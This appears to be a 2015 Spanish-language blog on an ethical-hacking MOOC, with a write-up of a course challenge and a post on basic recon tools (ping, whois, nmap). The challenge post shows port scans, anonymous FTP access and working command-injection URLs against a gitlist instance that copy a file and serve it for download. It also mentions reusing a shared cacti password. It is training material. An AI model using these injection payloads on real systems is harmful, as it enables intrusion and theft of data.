Los sistemas a los que no se les aplica niveles de seguridad avanzados son vulnerables a inyeccion de codigo sql. aquí les comparto un enlace con el que podrán realizar prácticas y ver como se hace inyeccion de codigo.
http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/
viernes, 23 de octubre de 2015
Paso para encontrar una vulnerabilidad y explotarla. Mooc Hacking ético Mondragon
esto se realiza utilizando las herramientas Nmap o zenmap
Namp
Nmap scan report for 188.166.94.208
Host is up (0.030s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
80/tcp open http
82/tcp filtered xfer
89/tcp filtered su-mit-tg
125/tcp filtered locus-map
146/tcp filtered iso-tp0
444/tcp filtered snpp
497/tcp filtered retrospect
667/tcp filtered disclose
668/tcp filtered mecomm
888/tcp filtered accessbuilder
900/tcp filtered omginitialrefs
902/tcp filtered iss-realsecure
1002/tcp filtered windows-icfw
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
nmap.org
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
Luego un análisis de vulnerabilidades utilizando herramientas existentes como Nessus o explorando en internet sobre las versiones de los sistemas instalados sus vulnerabilidades y explotaciones
Scan con Nessus
luego de encontrar las vulnerabilidades y puertos abiertos se procede a verificar desde lo más fácil a lo más dificil con la intención de ganar tiempo
Para descargar documento #1
Simple ftp anonimo
ftp://188.166.94.208/
Par descargar el documento #2
se utilizó una vulnerabilidad encontrada en gitlist la cual resolvimos actualizando el sistema.
Proceso de descarga:
http://188.166.102.65/gitlist/gitlist/blame/master/""`ls /usr/share/doc/base-files/`
http://188.166.102.65/gitlist/gitlist/blame/master/""`cp /usr/share/doc/base-files/mooc-hacking-team-0051-level-01.gpg /var/www/gitlist/cache`
http://188.166.102.65/gitlist/gitlist/blame/master/""`cd /var/www/gitlist/cache && python -m SimpleHTTPServer 8000`
http://188.166.102.65:8000 y descargar archivo
Documento #3
Este documento no lo pudimos descargar ya que no teníamos permisos para hacer pero si identificamos que era a travez de la aplicación cacti que se debe realizar asi que buscamos las contrasena en los servidores que pudimos e identificamos que todos teníamos la misma.
proceso
clave de cacti
sábado, 3 de octubre de 2015
Herramientas básicas para obtener información de servidores externos
Podemos encontrar una serie de herramientas básicas con las que se puede obtener informaciones servidores externos como son:
- El ping, es una herramienta que viene por default instalada en casi todos los sistemas operativos, mediante la cual podemos comprobar si un dispositivo esta en linea o no. dicha herramienta se utiliza a travez de la consola de la siguiente manera.
$ ping www.google.es
-
PING www.google.es (216.58.192.99): 56 data bytes64 bytes from 216.58.192.99: icmp_seq=0 ttl=58 time=52.455 ms64 bytes from 216.58.192.99: icmp_seq=1 ttl=58 time=50.550 ms64 bytes from 216.58.192.99: icmp_seq=2 ttl=58 time=66.285 ms64 bytes from 216.58.192.99: icmp_seq=3 ttl=58 time=50.712 ms64 bytes from 216.58.192.99: icmp_seq=4 ttl=58 time=51.087 ms64 bytes from 216.58.192.99: icmp_seq=5 ttl=58 time=61.689 ms64 bytes from 216.58.192.99: icmp_seq=6 ttl=58 time=51.021 ms64 bytes from 216.58.192.99: icmp_seq=7 ttl=58 time=50.464 ms^C--- www.google.es ping statistics ---8 packets transmitted, 8 packets received, 0.0% packet lossround-trip min/avg/max/stddev = 50.464/54.283/66.285/5.749 ms
- Otra herramienta muy util es el whois, esta herramienta nos permite saber a quien pertenece un dominio una dirección ip.
- Ejemplo:
-
juanjo$ whois 216.58.192.99## ARIN WHOIS data and services are subject to the Terms of Use# available at: https://www.arin.net/whois_tou.html## If you see inaccuracies in the results, please report at# http://www.arin.net/public/whoisinaccuracy/index.xhtml### Query terms are ambiguous. The query is assumed to be:# "n 216.58.192.99"## Use "?" to get help.### The following results may also be obtained via:# http://whois.arin.net/rest/nets;q=216.58.192.99?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2#NetRange: 216.58.192.0 - 216.58.223.255CIDR: 216.58.192.0/19NetName: GOOGLENetHandle: NET-216-58-192-0-1Parent: NET216 (NET-216-0-0-0-0)NetType: Direct AllocationOriginAS: AS15169Organization: Google Inc. (GOGL)RegDate: 2012-01-27Updated: 2012-01-27Ref: http://whois.arin.net/rest/net/NET-216-58-192-0-1OrgName: Google Inc.OrgId: GOGLAddress: 1600 Amphitheatre ParkwayCity: Mountain ViewStateProv: CAPostalCode: 94043Country: USRegDate: 2000-03-30Updated: 2013-08-07Ref: http://whois.arin.net/rest/org/GOGLOrgAbuseHandle: ZG39-ARINOrgAbuseName: Google IncOrgAbusePhone: +1-650-253-0000OrgAbuseEmail: arin-contact@google.comOrgAbuseRef: http://whois.arin.net/rest/poc/ZG39-ARINOrgTechHandle: ZG39-ARINOrgTechName: Google IncOrgTechPhone: +1-650-253-0000OrgTechEmail: arin-contact@google.comOrgTechRef: http://whois.arin.net/rest/poc/ZG39-ARIN## ARIN WHOIS data and services are subject to the Terms of Use# available at: https://www.arin.net/whois_tou.html## If you see inaccuracies in the results, please report at# http://www.arin.net/public/whoisinaccuracy/index.xhtml
- Una de mis herramientas favoritas es el nmap, esta nos permite ver que puertos tiene abiertos un servidor.
- Ejemplo:
-
juanjo$ nmap google.esStarting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-10-03 10:36 ASTNmap scan report for google.es (216.58.192.99)Host is up (0.070s latency).Other addresses for google.es (not scanned): 2607:f8b0:4008:80b::2003rDNS record for 216.58.192.99: mia07s35-in-f3.1e100.netNot shown: 998 filtered portsPORT STATE SERVICE80/tcp open http443/tcp open httpsNmap done: 1 IP address (1 host up) scanned in 9.88 seconds
Suscribirse a:
Entradas (Atom)